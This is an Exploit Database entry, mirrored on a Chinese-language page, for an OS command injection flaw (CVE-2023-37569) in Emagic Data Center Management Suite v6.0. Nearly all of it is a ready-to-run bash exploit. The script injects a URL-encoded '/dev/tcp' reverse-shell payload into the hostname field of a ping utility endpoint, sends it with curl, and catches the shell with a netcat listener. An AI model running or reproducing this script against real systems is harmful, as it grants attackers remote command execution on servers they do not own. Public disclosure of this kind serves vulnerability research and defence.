Emagic Data Center Management Suite v6.0 – OS Command Injection

• Exploit Database
• 20 阅读

• 作者： thewhiteh4t
  日期： 2023-08-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51673/

• #!/bin/bash
  
  # Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
  # Date: 03-08-2023
  # Exploit Author: Shubham Pandey & thewhiteh4t
  # Vendor Homepage: https://www.esds.co.in/enlight360
  # Version: 6.0.0
  # Tested on: Kali Linux
  # CVE : CVE-2023-37569
  
  URL=$1
  LHOST=$2
  LPORT=$3
  
  echo "*****************************"
  echo "*ESDS eMagic 6.0.0 RCE*"
  echo "*> CVE-2023-37569 *"
  echo "*> Shubham & thewhiteh4t*"
  echo "*****************************"
  
  if [ $# -lt 3 ]; then
  echo """
  USAGE :
  
  ./exploit.sh http://<IP> <LHOST> <LPORT>
  ./exploit.sh http://192.168.0.10 192.168.0.20 1337
  """
  exit 1
  fi
  
  url="$1/index.php/monitor/operations/utilities/"
  
  echo "[+] URL : $URL"
  echo "[+] LHOST : $LHOST"
  echo "[+] LPORT : $LPORT"
  echo
  
  payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"
  
  post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"
  
  echo "[!] Triggering exploit..."
  
  echo $url
  
  (sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &
  
  echo "[+] Catching shell..."
  nc -lvp 4444